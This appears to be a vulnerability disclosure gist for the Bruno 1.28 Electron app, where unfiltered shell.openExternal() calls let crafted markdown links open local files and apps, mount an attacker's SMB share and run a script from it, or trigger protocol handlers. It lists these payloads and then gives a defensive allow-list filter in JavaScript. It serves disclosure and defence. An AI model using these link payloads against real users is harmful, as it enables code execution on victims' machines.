@opcod3r
Created September 22, 2024 22:14
Bruno 1.28 Exploit Code shell.openExternal Electron NodeJS

Reported by: Rodolfo Tavares ~ opcod3r

The Bruno desktop app (Electron) opens links with `shell.openExternal()` without restricting what the link target may be. Because the target is handed straight to the operating system's URL and file handler, an attacker who can get a crafted link in front of a user can make the victim's machine open a local file path, connect to a remote SMB share, or launch an application through a custom URL scheme, which leads to code execution on the victim's machine when the user middle-clicks the link. The victim has to interact with the link and can see the URL that is opened. Fixed in https://github.com/usebruno/bruno/pull/3122/files

POC Linux: https://youtu.be/SPCGVLEfVgw

POC Windows: https://youtu.be/KVwKQkXA-vI

POC MacOS: https://youtu.be/S0W93tbKaFY

- **File and path exploitation:**
  - `[calc](/System/Applications/Calculator.app)` – Opens Calculator on macOS through an absolute path.
  - `[calcFile](System/Applications/Calculator.app)` – The same through a relative path.
  - `[exploit1](smb://10.211.55.6/public/hello.scptd)` – Connects to a remote SMB share that hosts a script bundle (`hello.scptd`); together with the next link this runs a script served from the attacker's share.
  - `[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt)` – Executes the script from the mounted volume on macOS.
  - `[file](///etc/hosts)` – Opens the system's `/etc/hosts` file in the default handler on macOS/Linux.
  - On Windows, the same kind of link with the target `calc.exe` launches the calculator; any other executable can be substituted for a real payload.

- **Protocol exploitation:**
  - `[facetime1](facetime:+123456789)` – Attempts to launch FaceTime with a specific phone number.
  - `[facetime2](facetime:someone@example.com)` – Triggers FaceTime using an email address.
  - `[tel](tel:+123456789)` – Initiates a phone call via the `tel:` protocol.
  - `[mail](x-apple-reminder://)` – Opens the Apple Reminders app via a custom protocol.
  - `[calendar](calendar://)` – Attempts to open a calendar application.
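The root cause described above is that the link target reaches `shell.openExternal()` unfiltered. The following is an added example, not code from Bruno or from this gist, showing the vulnerable pattern next to an allow-list filter that only lets `http:`/`https:` URLs through. It runs under plain Node.js: the Electron `shell` object is passed in as a parameter so a recording stub can stand in for it, the `https://example.com/docs` URL and the target list are constructed for the demo (the list repeats the payloads from the bullets above), and the allow-list is this example's choice, not the project's actual fix.

```javascript
// Added example, not Bruno's code: an allow-list in front of shell.openExternal().
// `shell` is injected so the block runs under plain Node.js with a stub.

// Only web URLs are handed to the OS; file paths, smb://, tel:, facetime:
// and custom app schemes never reach the handler.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Vulnerable pattern: whatever the link contained goes straight to the OS.
function openLinkUnsafe(target, shell) {
  shell.openExternal(target);
  return true;
}

// Returns the normalized URL if it is safe to hand to the OS, otherwise null.
function safeExternalUrl(target) {
  if (typeof target !== "string") return null;
  let url;
  try {
    // Bare paths ("/System/...", "calc.exe", "///etc/hosts") have no scheme,
    // so the WHATWG parser throws and they are rejected here.
    url = new URL(target);
  } catch (e) {
    return null;
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  // Also drop "https://user:pass@host" style links.
  if (url.username !== "" || url.password !== "") return null;
  return url.href;
}

// Hardened pattern: open only what passes the filter, report what was dropped.
function openLinkSafe(target, shell) {
  const href = safeExternalUrl(target);
  if (href === null) return false;
  shell.openExternal(href);
  return true;
}

// Runs a list of link targets through both handlers with a recording stub
// and returns which targets each handler actually passed to the OS.
function compareHandlers(targets) {
  const opened = { unsafe: [], safe: [] };
  const stubShell = (bucket) => ({ openExternal: (t) => bucket.push(t) });
  for (const t of targets) {
    openLinkUnsafe(t, stubShell(opened.unsafe));
    openLinkSafe(t, stubShell(opened.safe));
  }
  return opened;
}

// Constructed sample: one benign link plus the payloads from the list above.
const SAMPLE_TARGETS = [
  "https://example.com/docs",
  "/System/Applications/Calculator.app",
  "System/Applications/Calculator.app",
  "smb://10.211.55.6/public/hello.scptd",
  "/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt",
  "///etc/hosts",
  "calc.exe",
  "facetime:+123456789",
  "tel:+123456789",
  "x-apple-reminder://",
  "calendar://",
];

const demo = compareHandlers(SAMPLE_TARGETS);
console.log("unsafe handler passed through:", demo.unsafe.length, "targets");
console.log("safe handler passed through:  ", demo.safe);
```

Parsing with `new URL()` and checking `url.protocol` is deliberately stricter than a regex on the prefix: it rejects scheme-less paths outright and normalizes case, so `HTTP://Example.com` is opened as `http://example.com/` while `javascript:` and `file:` URLs are dropped like every other non-web scheme.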

For more information, watch the videos linked above :)